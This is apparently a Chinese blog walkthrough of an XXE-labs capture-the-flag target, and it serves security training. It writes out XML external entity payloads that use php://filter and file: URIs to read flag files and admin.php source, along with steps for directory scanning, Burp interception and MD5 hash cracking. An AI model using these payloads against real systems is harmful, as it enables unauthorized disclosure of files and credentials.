XXE-labs靶场 XXE 靶机(通关攻略)

靶场搭建

随便输入一个账号密码登录 并用bp进行抓包

右击发送到重放器(Reperter)

复制代码
<?xml version="1.0"?>
<!DOCTYPE foo [
 <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/flag/flag"> ] >

通过php协议base64加密读写flag

将得到的编码进行base64解密

得到flag

靶机搭建

靶机IP:192.168.131.169

御剑工具扫描后台目录

分别访问两个目录

发现两个子文件 分别尝试访问

admin.php访问失败 试试另外一个

访问xxe 发现是一个登录页面

随机输入账号密码登录进行bp抓包

右击发到重放器

可以看到有回显信息

复制代码
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ] >

通过php协议base64加密读写admin.php

将得到的编码进行base64解码

查看解码的结果可以看到username password

进行cmd5解密 得到密码

进行admin.php登陆

点击flag

没有找到,将发现的flagmeout.php放到xxe里找一下,右击查看源代码

得到JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5

先进行base32解码 再进行base64解码

得到路径,再次抓包

复制代码
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "file:etc/.flag.php" > ]>

将得到的代码放入php文件中运行

得到flag

相关推荐
一只栖枝3 小时前
网络安全 vs 信息安全的本质解析:数据盾牌与网络防线的辩证关系关系
网络·网络安全·信息安全·it·信息安全认证
安全系统学习3 小时前
【网络安全】Mysql注入中锁机制
安全·web安全·网络安全·渗透测试·xss
CertiK4 小时前
CertiK《Hack3d:2025年第二季度及上半年Web3.0安全报告》(附报告全文链接)
网络
一只小鱼儿吖6 小时前
进程代理单窗口单IP技术:原理、应用与实现
网络·网络协议·tcp/ip
稳联技术6 小时前
Ethernet IP与Profinet共舞:网关驱动绿色工业的智慧脉动
网络·网络协议·tcp/ip
学习3人组6 小时前
CentOS配置网络
linux·网络·centos
怦然星动_6 小时前
DHCP中继及动态分配
网络安全
~山有木兮7 小时前
LiteHub中间件之限流实现
网络·http·中间件
cui_win7 小时前
【网络】Linux 内核优化实战 - net.core.flow_limit_table_len
linux·运维·网络
BD_Marathon8 小时前
虚拟机网络检查
网络